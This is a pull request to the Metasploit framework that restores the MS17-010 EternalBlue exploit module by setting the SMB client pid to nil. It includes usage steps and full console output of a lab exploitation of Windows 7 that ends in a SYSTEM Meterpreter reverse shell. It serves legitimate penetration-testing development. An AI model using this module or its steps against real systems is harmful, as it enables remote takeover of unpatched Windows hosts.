### PR TITLE
Set pid to nil for MS17-010 SMB1 clients

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -338,6 +338,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
     client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)
+    client.pid = nil
     response_code = client.login
 
     unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
@@ -382,6 +383,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
     client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)
+    client.pid = nil
     client.negotiate
 
     pkt = ''


### PR DESCRIPTION
This fixes an issue with the `exploit/windows/smb/ms17_010_eternalblue` module that was preventing it from obtaining a session. The original issue was reported out of band as affecting version 6.x but not 5.x. Upon further inspection and thanks to the handy dandy `git bisect` I was able to track it down to metasploit-framework [6e8e6676](https://github.com/rapid7/metasploit-framework/commit/6e8e6676b22cc0a90e809eccc7a1307ad33a9ef4) which updates ruby_smb from v2.0.2 to v2.0.3. Continuing on the bisect path led me to ruby_smb [bea9da87](https://github.com/rapid7/ruby_smb/commit/bea9da87fac1af95aa5e3bcfd6081419b2b49892) and ultimately [lib/ruby_smb/client.rb#L448](https://github.com/rapid7/ruby_smb/blob/bea9da87fac1af95aa5e3bcfd6081419b2b49892/lib/ruby_smb/client.rb#L448). This alters how the `#pid_low` field is handled which was causing the exploit to fail.

To address the issue without reverting the changes to ruby_smb, I set the SMB client's `#pid` attribute to `nil` which fixes the exploit by causing ruby_smb to not alter the header's `#pid_low` field. With this change in place the exploit is pretty reliable again. Sometimes after repeated exploitation the system needs to be rebooted however, so watch out for that.

I tested the psexec variants of this exploit and they did not appear to be affected by this bug so no changes are necessary on that front.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/ms17_010_eternalblue`
- [x] Set the options as appropriate to target a vulnerable system (I used Windows 7)
- [x] Run the exploit and receive a valid session

## Example Output

<details>
<summary>Before the patch</summary>

There's a delay of about a minute or two before the connection.
```
[*] Started reverse TCP handler on 192.168.250.29:4444 
[*] 192.168.159.38:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.159.38:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.159.38:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.159.38:445 - Connecting to target for exploitation.
[+] 192.168.159.38:445 - Connection established for exploitation.
[+] 192.168.159.38:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.159.38:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.159.38:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.159.38:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.159.38:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.159.38:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.159.38:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.159.38:445 - Sending all but last fragment of exploit packet
[*] 192.168.159.38:445 - Starting non-paged pool grooming
[+] 192.168.159.38:445 - Sending SMBv2 buffers
[+] 192.168.159.38:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.159.38:445 - Sending final SMBv2 buffers.
[*] 192.168.159.38:445 - Sending last fragment of exploit packet!
[*] 192.168.159.38:445 - Receiving response from exploit packet
[-] 192.168.159.38:445 - Did not receive a response from exploit packet
[*] 192.168.159.38:445 - Sending egg to corrupted connection.
[-] 192.168.159.38:445 - Errno::ECONNRESET: Connection reset by peer
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```
</details>

<details>
<summary>After the patch</summary>

```
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.38:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.159.38:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.159.38:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.159.38:445 - Connecting to target for exploitation.
[+] 192.168.159.38:445 - Connection established for exploitation.
[+] 192.168.159.38:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.159.38:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.159.38:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.159.38:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.159.38:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.159.38:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.159.38:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.159.38:445 - Sending all but last fragment of exploit packet
[*] 192.168.159.38:445 - Starting non-paged pool grooming
[+] 192.168.159.38:445 - Sending SMBv2 buffers
[+] 192.168.159.38:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.159.38:445 - Sending final SMBv2 buffers.
[*] 192.168.159.38:445 - Sending last fragment of exploit packet!
[*] 192.168.159.38:445 - Receiving response from exploit packet
[+] 192.168.159.38:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.159.38:445 - Sending egg to corrupted connection.
[*] 192.168.159.38:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.159.38
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.38:49166) at 2020-10-20 17:08:20 -0400
[+] 192.168.159.38:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.159.38:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.159.38:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-9NSI4A6AIHJ
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter >
```
</details>